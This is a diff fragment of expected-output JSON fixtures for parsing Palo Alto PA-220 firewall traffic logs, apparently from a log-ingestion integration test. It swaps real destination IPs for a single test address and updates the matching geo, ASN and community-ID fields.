"network": { "community_id": [ - "1:08BinpWe/JWymiOV0oCsRR8Lo4Q=", - "1:FfbVY/+5Mds7zDjSs5/Yfw5bxNQ=" + "1:bG1wqNG4Ax1y+YU0zveASH+qAnk=", + "1:1fkY5RRVUI2gwig/WeMdrwk+rDY=" ], "transport": "tcp", "application": "ssl", @@ -2950,14 +2980,14 @@ ], "ip": [ "192.168.15.224", - "98.138.49.44", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 17000000000, - "ingested": "2021-09-08T12:40:05.941849085Z", - "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031535500Z", + "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2980,27 +3010,29 @@ "destination": { "nat": { "port": 443, - "ip": "72.30.3.43" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 26101, + "number": 4837, "organization": { - "name": "Oath Holdings Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 6106, - "ip": "72.30.3.43", + "ip": "175.16.199.1", "packets": 11 }, "rule": { @@ -3019,7 +3051,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3034,7 +3066,7 @@ "destination": { "nat": { "port": 443, - "ip": "72.30.3.43" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -3056,7 +3088,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:TGvDRLypWuNWkuMsAxPzc5TSbAo=" + "community_id": "1:BAjwbfG6RvvWoYCU0ECKtnp8Rk4=" } }, "sequence_number": 32091130, @@ -3076,8 +3108,8 @@ ], "network": { "community_id": [ - "1:2NNXjZpDcB9oYU1TRLRSU5v7hoQ=", - "1:TGvDRLypWuNWkuMsAxPzc5TSbAo=" + "1:nXPS7U5xAcRDCiIlryWM4rEfFC8=", + "1:BAjwbfG6RvvWoYCU0ECKtnp8Rk4=" ], "transport": "tcp", "application": "ssl", @@ -3117,14 +3149,14 @@ ], "ip": [ "192.168.15.224", - "72.30.3.43", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 17000000000, - "ingested": "2021-09-08T12:40:05.941852548Z", - "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031541Z", + "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3147,27 +3179,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 196, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -3186,7 +3220,7 @@ "packets": 2, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3201,7 +3235,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -3275,14 +3309,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941856116Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031546500Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3305,27 +3339,29 @@ "destination": { "nat": { "port": 80, - "ip": "172.217.9.142" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 3245, - "ip": "172.217.9.142", + "ip": "175.16.199.1", "packets": 17 }, "rule": { @@ -3344,7 +3380,7 @@ "packets": 19, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3359,7 +3395,7 @@ "destination": { "nat": { "port": 80, - "ip": "172.217.9.142" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -3381,7 +3417,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:NNgF+9vrbBFNpCI3JhUT4YWepd4=" + "community_id": "1:CqASRU4+LIyznvpnaQLFczr0paw=" } }, "sequence_number": 32091132, @@ -3401,8 +3437,8 @@ ], "network": { "community_id": [ - "1:JJQ4CQTTE3x7lV+Npo80V7dd6ts=", - "1:NNgF+9vrbBFNpCI3JhUT4YWepd4=" + "1:2Ml8h+9DWxjM3y1S0KDSnPUw5i8=", + "1:CqASRU4+LIyznvpnaQLFczr0paw=" ], "transport": "tcp", "application": "ocsp", @@ -3442,14 +3478,14 @@ ], "ip": [ "192.168.15.224", - "172.217.9.142", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 116000000000, - "ingested": "2021-09-08T12:40:05.941859639Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031551100Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3472,27 +3508,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 179, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -3511,7 +3549,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3526,7 +3564,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -3548,7 +3586,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:9T+RKr8xDB21pvAf/Fihyq72sLY=" + "community_id": "1:NSA2qdITGuu6//2R09CwIX3i8FE=" } }, "sequence_number": 32091133, @@ -3568,8 +3606,8 @@ ], "network": { "community_id": [ - "1:URR/wC9NPuHbnjGQ1Y7LffVYlTc=", - "1:9T+RKr8xDB21pvAf/Fihyq72sLY=" + "1:FlksUdaebhTer2TPcpfwCUq7loY=", + "1:NSA2qdITGuu6//2R09CwIX3i8FE=" ], "transport": "udp", "application": "dns", @@ -3609,14 +3647,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941863106Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031555400Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3639,30 +3677,29 @@ "destination": { "nat": { "port": 443, - "ip": "54.84.80.198" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 4537, - "ip": "54.84.80.198", + "ip": "175.16.199.1", "packets": 12 }, "rule": { @@ -3681,7 +3718,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3696,7 +3733,7 @@ "destination": { "nat": { "port": 443, - "ip": "54.84.80.198" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -3718,7 +3755,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:k69UBIONLgCiGo9UhMOEY0pQnZ4=" + "community_id": "1:nXJPMgyoZKPj/sFnRLx/46siasg=" } }, "sequence_number": 32091134, @@ -3738,8 +3775,8 @@ ], "network": { "community_id": [ - "1:OnS/uikvrbdse63UYQtmHKrEk7k=", - "1:k69UBIONLgCiGo9UhMOEY0pQnZ4=" + "1:rEtmJzEn+xPva9gOVVLylYzxPWc=", + "1:nXJPMgyoZKPj/sFnRLx/46siasg=" ], "transport": "tcp", "application": "traps-management-service", @@ -3779,14 +3816,14 @@ ], "ip": [ "192.168.15.224", - "54.84.80.198", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941866628Z", - "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031560800Z", + "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:30.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3809,25 +3846,30 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 + } + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, "port": 4282, "bytes": 0, - "packets": 0, - "ip": "199.167.55.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "name": "new_outbound_from_trust" @@ -3845,7 +3887,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3860,7 +3902,7 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -3882,7 +3924,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:07q7McJtir76GhJwAJffz+C0sNo=" + "community_id": "1:8Hhd+w2Y0MvaNiYYEmdNER3RtJI=" } }, "sequence_number": 32091135, @@ -3902,8 +3944,8 @@ ], "network": { "community_id": [ - "1:wFD93203ukPDpbZjVJE5SAMYrw4=", - "1:07q7McJtir76GhJwAJffz+C0sNo=" + "1:22CvovQQDhMcaR2aY+8zyK8hACA=", + "1:8Hhd+w2Y0MvaNiYYEmdNER3RtJI=" ], "transport": "tcp", "application": "incomplete", @@ -3943,14 +3985,14 @@ ], "ip": [ "192.168.15.224", - "199.167.55.52", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 13000000000, - "ingested": "2021-09-08T12:40:05.941870221Z", - "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031566600Z", + "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:32.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3973,27 +4015,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -4012,7 +4056,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4027,7 +4071,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4101,14 +4145,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941873698Z", - "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031570500Z", + "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:33.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4131,27 +4175,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": 